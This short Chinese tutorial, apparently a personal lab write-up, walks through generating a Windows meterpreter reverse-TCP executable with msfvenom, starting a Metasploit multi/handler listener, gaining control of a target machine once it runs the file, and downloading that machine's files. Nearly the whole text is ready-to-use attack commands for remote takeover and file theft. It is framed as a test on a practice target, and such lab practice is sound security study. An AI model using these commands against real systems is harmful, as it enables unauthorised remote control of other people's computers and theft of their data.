1、在kali中生成一个被控端
输入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /home/payload.exe
这里目标IP我填的是kali的IP。
可以看到文件中生成了payload.exe
2、在kali中打开Metasploit
依次输入
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 目标ip
set lport 5000
exploit
在靶机中打开kali生成的payload.exe后会有以下显示
说明已经获得靶机控制权。
3、下载靶机中的文件
输入ls可以查看靶机中的文件信息
输入download 文件名可以下载文件
测试完成